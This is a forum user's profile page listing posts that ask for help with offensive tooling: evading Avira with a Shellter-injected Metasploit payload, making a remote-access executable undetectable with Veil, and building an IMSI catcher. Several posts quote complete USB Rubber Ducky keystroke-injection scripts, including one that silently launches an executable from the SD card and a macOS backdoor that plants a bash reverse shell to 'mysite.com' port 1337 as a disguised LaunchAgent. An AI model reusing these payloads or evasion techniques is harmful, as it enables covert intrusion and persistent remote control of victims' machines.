Jump to content

Net_Spy

Active Members
  • Posts

    15
  • Joined

  • Last visited

Recent Profile Visitors

615 profile views

Net_Spy's Achievements

Newbie

Newbie (1/14)

  1. I recently read an artical and some reseach paper about turning your wifi into IMSI catcher. I woukd love to work on any ine can guide where ti get it start. What stuff do I needed to turn my wifi into IMSI catcher. Looking forward to your kind response. Regards
  2. @PoSHMagiC0de Thanks . I've tried both stage and stageless as well and yes avira does have a firewall , I've tried on an other machine on same network but with avira installed and it does established a connection with meterpreter session. Can you help me to sort it out and bypass it. I could not figure it out . Looking forward to your kind response. Regards Net_Spy
  3. Greetings, I've created an payload using shellter with injection using putty binary. File is not detected by av but payload does not send connection back to metasploit machine , if I disable the avira AV payload executed successfully. Can any one help me to deal with this while av is enabled and bypass as well to get successful connection. looking forward to your kind response. Regards Net_Spy
  4. Hello, Im confuse to decide thebest adoptor with supports long range and latest 801.02 protocol. can any one suggest me antina + adoptor . Thanks
  5. Hi, I've searched forum for mac payload and found two script that does not work out on mac . I need an script to run and make that persistent. or to run a file via sdcard . Looking forward for your kind response. Regards Net_Spy
  6. I've renamed my drive to same and file to t.exe . Im trying it on windows 7 . Regards Net_Spy
  7. Greetings , I've come across to a script that claim to be faster then script written by overwraith REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER overwraith script working greate only taking few seconds and lots of commands .Following is the shorten scrip DELAY 3000 GUI r DELAY 100 cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe DELAY 10 ENTER I've tried it but fialed to execute it , It gives error windows can not find 'c' .Make you typed the named correctly , and then try again. Is there any way to make that above short script to run an exe from sd . Regards Net_Spy
  8. @V3sth4cks153 Do I need to make usb firmware as twin compose for that or not?? Regards Net_Spy
  9. Greetings, I'm looking for a payload for rubber ducky to execute on mac os and give persistance connection even after a restart of target. I've found below script that only can intiate reverse connection once. Can any one help me out to make it persistance to run reverse connection paylopad after each reboot or when machine come back on line after shutdown. Here is the script made by Patrick REM Patrick Mosca REM A simple script for creating a persistent backdoor on OSX. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 GUI SPACE STRING terminal DELAY 500 ENTER DELAY 500 STRING mkdir ~/Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > ~/Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x ~/Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir ~/Library/LaunchAgents ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>'$HOME'/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 GUI q
  10. Thanks , but I just wanted to hide those windows which opened via above mentioned script . like opening run prompt and typing command then opening cmd minimizing it etc. I only want to know is there a way to do these all silently . Regards Net_Spy
  11. It does not work , Ive install twin composit firmware its worked. One more thing I would like to know is there any way that payload runs with out any popup windows. Looking forward for your kind respond. Regards Net_Spy
  12. Furhter more Ive did little firmware update before above , firmware duck_v2.1.hex Steps followed from here using Ubunber. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky#Flashing_the_Firmware Number written on chip 32uc3b1256 Regards Net_Spy
  13. well I've generate following payload with the help of gui encoder. REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\form1.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER I copied exe into sdcar root path and inject.bin as well then pluged into windows XP it shows all command on cmd screen but exe does not execute . Regards Net_Spy
  14. Greetings , I would like to setup rubber ducky usb , I would appriciate if your assistance and I would like FUD my remote assitant tool exe as well any idea how to get this using veil or any other good method to FUD it with 0 detection. Thanks Regards
×
×
  • Create New...